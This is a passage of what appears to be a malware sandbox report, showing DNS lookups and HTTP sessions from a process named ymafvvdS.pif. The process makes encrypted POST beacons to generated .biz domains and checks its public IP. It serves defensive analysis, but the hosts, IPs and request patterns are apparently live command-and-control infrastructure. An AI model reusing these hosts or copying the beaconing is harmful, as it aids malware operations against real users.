                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.092195034 CET192.168.2.91.1.1.10xf068Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.230613947 CET192.168.2.91.1.1.10xdfc4Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.884445906 CET192.168.2.91.1.1.10x841cStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.108449936 CET192.168.2.91.1.1.10xa868Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.324650049 CET192.168.2.91.1.1.10x5924Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.320677996 CET192.168.2.91.1.1.10x5924Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.645046949 CET192.168.2.91.1.1.10xd307Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.783714056 CET192.168.2.91.1.1.10x985aStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.924352884 CET192.168.2.91.1.1.10x8e23Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:06:42.456146955 CET192.168.2.91.1.1.10x578aStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.169616938 CET192.168.2.91.1.1.10xa1e5Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.528405905 CET1.1.1.1192.168.2.90x5658No error (0)lwaziacademy.com41.185.8.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:21.528434038 CET1.1.1.1192.168.2.90x5658No error (0)lwaziacademy.com41.185.8.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.531740904 CET1.1.1.1192.168.2.90x1751No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.613818884 CET1.1.1.1192.168.2.90xcc9fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.613818884 CET1.1.1.1192.168.2.90xcc9fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.613818884 CET1.1.1.1192.168.2.90xcc9fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.613818884 CET1.1.1.1192.168.2.90xcc9fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.613818884 CET1.1.1.1192.168.2.90xcc9fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.613818884 CET1.1.1.1192.168.2.90xcc9fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.762520075 CET1.1.1.1192.168.2.90xd997No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.762520075 CET1.1.1.1192.168.2.90xd997No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.805236101 CET1.1.1.1192.168.2.90xbe6bNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:38.900460005 CET1.1.1.1192.168.2.90x8e2dNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.509748936 CET1.1.1.1192.168.2.90xe26No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.642160892 CET1.1.1.1192.168.2.90xe499No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.576323986 CET1.1.1.1192.168.2.90x541aNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.038377047 CET1.1.1.1192.168.2.90x1613No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.253587961 CET1.1.1.1192.168.2.90x4c43No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.253587961 CET1.1.1.1192.168.2.90x4c43No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.730432034 CET1.1.1.1192.168.2.90x1e7cNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.743771076 CET1.1.1.1192.168.2.90xf99No error (0)ww99.przvgke.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.221590996 CET1.1.1.1192.168.2.90xd53No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.221590996 CET1.1.1.1192.168.2.90xd53No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.445831060 CET1.1.1.1192.168.2.90xc962No error (0)webmail.thematman.com.au103.20.200.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.713200092 CET1.1.1.1192.168.2.90x998aNo error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.713200092 CET1.1.1.1192.168.2.90x998aNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.713200092 CET1.1.1.1192.168.2.90x998aNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.760778904 CET1.1.1.1192.168.2.90x8fa1No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.760778904 CET1.1.1.1192.168.2.90x8fa1No error (0)76899.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.223753929 CET1.1.1.1192.168.2.90xc1ffName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.697482109 CET1.1.1.1192.168.2.90xb6f9No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.229682922 CET1.1.1.1192.168.2.90xf068Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.367852926 CET1.1.1.1192.168.2.90xdfc4No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.107588053 CET1.1.1.1192.168.2.90x841cName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.323951006 CET1.1.1.1192.168.2.90xa868Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.339792013 CET1.1.1.1192.168.2.90x5924No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.457187891 CET1.1.1.1192.168.2.90x5924No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.782947063 CET1.1.1.1192.168.2.90xd307Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.923464060 CET1.1.1.1192.168.2.90x985aName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.061625957 CET1.1.1.1192.168.2.90x8e23No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:06:43.388295889 CET1.1.1.1192.168.2.90x578aNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.307065964 CET1.1.1.1192.168.2.90xa1e5No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false

                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                        • lwaziacademy.com
                                                                                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                                                                                        • pywolwnvd.biz
                                                                                                                                                                                                                        • checkip.dyndns.org
                                                                                                                                                                                                                        • ssbzmoy.biz
                                                                                                                                                                                                                        • cvgrf.biz
                                                                                                                                                                                                                        • npukfztj.biz
                                                                                                                                                                                                                        • przvgke.biz
                                                                                                                                                                                                                        • ww99.przvgke.biz
                                                                                                                                                                                                                        • ww12.przvgke.biz
                                                                                                                                                                                                                        • ww7.przvgke.biz
                                                                                                                                                                                                                        • knjghuig.biz
                                                                                                                                                                                                                        • lpuegx.biz
                                                                                                                                                                                                                        • vjaxhpbji.biz

                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        0192.168.2.94970954.244.188.177807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.720594883 CET350OUTPOST /nimjw HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.720594883 CET802OUTData Raw: b5 c1 9b 81 1f 42 13 60 16 03 00 00 66 ba a4 50 af c0 50 f2 ca 02 8c a2 99 b4 dc 45 d1 f5 a5 62 ba cf 73 0f 7b 95 db c2 49 97 67 d8 53 28 67 e3 00 13 e4 92 7c e0 fd 63 f1 74 c3 5c 58 49 7b fd 47 cb eb 96 c7 76 39 2a 5f ff 07 d6 ed 55 b6 b6 32 b6
                                                                                                                                                                                                                        Data Ascii: B`fPPEbs{IgS(g|ct\XI{Gv9*_U2[5J=w^QWV\khOcW$"i(;(w=rdn9H }BYN{m$MIx'JLirV$Kq~~1f
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.061935902 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:35 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=68d67ed680651f244aab0a09a47772a7|8.46.123.228|1733810735|1733810735|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        1192.168.2.949710158.101.44.242807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:34.749125004 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Dec 10, 2024 07:05:35.985436916 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:35 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 508cd42645da4c9f619d8e5a8af07ce4
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.171304941 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.547095060 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:36 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 7d0fb38e2d90ffe7dac24b8f7130ae34
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.488719940 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Dec 10, 2024 07:05:45.862093925 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:45 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 27a89da4e72b6cbf58995bfc17fed7d6
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        2192.168.2.94971318.141.10.107807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.974234104 CET346OUTPOST /jae HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:05:36.974292040 CET802OUTData Raw: 02 82 ad 59 40 75 07 f1 16 03 00 00 af a1 08 5a 48 0d b9 52 84 09 62 42 46 a6 f8 54 97 e5 52 40 69 a0 1e 1b cc 34 7e eb 14 91 0a b5 71 05 65 5b 12 69 8c b4 71 7e e2 76 2c dc de 02 82 c5 bf f6 d9 22 c7 59 d1 92 de 00 e7 8e 9b 7f fd f8 cf 13 af 29
                                                                                                                                                                                                                        Data Ascii: Y@uZHRbBFTR@i4~qe[iq~v,"Y)7Z6>Vp0:_2T;1<Z\x^`#%dJO3bSbmJ$/z|y}\>)Uay&1X>m*AFB)4yp$bM<zM3z
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.014857054 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:38 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=f435a1d2f0e2efd83fa870afa4fc631b|8.46.123.228|1733810738|1733810738|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        3192.168.2.94971554.244.188.177807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.074668884 CET348OUTPOST /kka HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.074693918 CET778OUTData Raw: b8 1d 04 bc 3f e1 e7 c0 fe 02 00 00 57 1b 24 a4 22 8c cf 0a 12 a7 82 a1 55 ca bd f0 fa 37 24 20 66 74 ab 6b a0 ac b4 a1 6c e9 46 d7 b6 31 99 7a d5 f2 3a 9d 6b e3 2e 6b 7a b8 4c 98 d5 02 cc 0e 5c 25 df 05 a4 20 21 31 e4 0c 92 ab 5c ae de 4e 3b 38
                                                                                                                                                                                                                        Data Ascii: ?W$"U7$ ftklF1z:k.kzL\% !1\N;8)6zpQ Z.m<?sNSG\/9*:Wz;D0)4JM?}&Q(32}E_N:_oP4G.*{'knM|W
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.414022923 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:40 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=dd794f5222cebeedcd6471706afb475b|8.46.123.228|1733810740|1733810740|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        4192.168.2.94971754.244.188.177807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.656440020 CET345OUTPOST /fapn HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:05:39.656440020 CET802OUTData Raw: 4b c6 79 24 48 1f c3 8e 16 03 00 00 1c a9 0f 79 a0 e9 b4 a4 df bc 0a 5a a9 6e 95 31 38 7a 3d 8e 4f 0b fc 97 63 43 84 e1 db 8f d7 bf 6a 7e 96 8e 88 21 82 30 25 03 b6 25 96 22 bd d6 c5 e8 6a ed 5b 86 f9 64 a2 fa 5a b1 7d c7 1a b4 fa 24 80 b7 9c b1
                                                                                                                                                                                                                        Data Ascii: Ky$HyZn18z=OcCj~!0%%"j[dZ}$K@V;%'#6yUc4zCe%P~"lQjETMFj1zq\`xT&*A,l1iW&uhU;zZa4ti+]nx7RoSi4i6ijXyXe3)vh
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.996707916 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:40 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=b6241afb6f0e7a61be300cb479982f9f|8.46.123.228|1733810740|1733810740|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        5192.168.2.94971818.141.10.107807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.804321051 CET356OUTPOST /fupmvmgjbhmts HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.804337978 CET778OUTData Raw: 22 2d 3a f5 cf 12 06 63 fe 02 00 00 21 ca 47 8a 89 f0 fe 05 e5 54 a6 c0 08 45 30 a5 92 2d ff 93 e7 56 e0 6a ca 1f 8f 77 88 54 27 0f dd c7 af 8f a1 b9 66 a8 74 ed 5e 81 e7 af 62 41 77 e5 30 c9 7b 6a 41 e1 45 2f 5d 1c 89 e6 d6 d7 5b 48 a0 ff c3 09
                                                                                                                                                                                                                        Data Ascii: "-:c!GTE0-VjwT'ft^bAw0{jAE/][H/.Fiy^MsuwAS|H6|qe<bM?Cv,:tV["*lSTS0fFqHiPY]8@0W1`
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.842129946 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:42 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=34b0590def71f49f74c10f5480a5b016|8.46.123.228|1733810742|1733810742|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        6192.168.2.94971944.221.84.105807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.822365046 CET359OUTPOST /xujrrbphgxpfxye HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.822403908 CET802OUTData Raw: 33 2c 8b 7d a6 a0 02 d8 16 03 00 00 45 e1 84 11 e8 2c 99 ec 6e b8 9a 8d 5a e5 ef 43 2f 72 6f cc 9f aa 29 2c 82 04 94 2e 7e a7 f1 e9 9e 50 ed 6c 4f 52 48 23 72 99 33 8c f9 ff f0 1a 05 33 a6 2d ab 35 d2 5a a0 b0 53 7a 83 cb fa 44 4d 62 3b 2a 75 8d
                                                                                                                                                                                                                        Data Ascii: 3,}E,nZC/ro),.~PlORH#r33-5ZSzDMb;*u@p<|/*b&9od-T{&'u0,cK`%>r#%O~s>z$@\F*uy9c _\)S_4ZC>}L]F`}JEF\;
                                                                                                                                                                                                                        Dec 10, 2024 07:05:42.919414043 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:42 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
